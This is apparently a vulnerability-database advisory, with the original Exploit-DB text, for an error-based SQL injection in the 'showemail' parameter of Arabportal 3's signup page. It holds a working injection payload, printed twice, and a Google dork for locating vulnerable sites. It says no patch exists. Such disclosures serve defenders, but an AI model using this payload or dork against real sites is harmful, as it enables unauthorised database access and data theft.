Arabportal 3 SQL injection vulnerability

vendor:

Arabportal 3

by:

ali ahmady

8.8

CVSS

HIGH

SQL injection

CWE

Product Name: Arabportal 3

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2015

Arabportal 3 SQL injection vulnerability

The Arabportal 3 registeration section is vulnerable to an error based SQL injection attack. The POST parameter 'showemail' is vulnerable to the attack. An example of the attack is 1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 


members.php?action=singup

POST parameter "showemail" is vulnerable to error based SQLi attack

................................................................................

1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady


video : https://youtu.be/5nFblYE90Vk

good luck